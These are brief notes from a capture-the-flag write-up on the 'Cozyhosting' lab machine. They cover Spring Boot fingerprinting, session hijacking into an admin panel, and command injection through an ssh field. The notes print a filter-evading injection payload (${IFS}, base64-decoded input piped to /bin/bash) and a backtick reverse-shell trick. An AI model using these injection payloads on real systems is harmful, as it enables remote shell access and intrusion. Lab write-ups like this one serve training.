Cozyhosting

Step of exploitation and Lesson Learn

• white labeled error page show that this app is spring boot (java)

• Normal directory search not working, so we use springboot specific wordlist from seclist

• Use session parameter and get into admin panel using session

Technique to escape ssh command

• use ${IFS} for white spacing

encode payload to Base 64 and decode to spawn shell

;echo${IFS}<encodedshell>|base64${IFS}-d|/bin/bash;

use "` `" as command substitution

;`encoded reverse_shell`